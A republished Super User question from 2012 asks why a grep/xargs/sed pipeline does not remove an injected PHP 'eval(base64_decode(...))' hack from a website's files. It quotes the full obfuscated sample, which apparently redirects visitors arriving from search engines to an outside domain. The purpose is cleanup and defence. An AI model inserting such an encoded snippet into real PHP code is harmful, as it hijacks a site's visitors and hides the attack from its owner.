grep, xargs, sed to clean up PHP eval hack

Posted by roktechie on Super User See other posts from Super User or by roktechie
Published on 2012-11-05T16:14:27Z Indexed on 2012/11/05 17:05 UTC
Read the original article Hit count: 261

Filed under:
|
|

I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site.

Sample code to match/remove

<?php           eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9"));

Attempted command:

sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php           eval(base64_decode[^;]*;/<?php\n/g'

The sudo has been added as it is required to have permission to read/write on the dir I'm accessing. The files list properly from grep, but are not changed by sed. Any suggestions?

© Super User or respective owner

Related posts about grep

Related posts about sed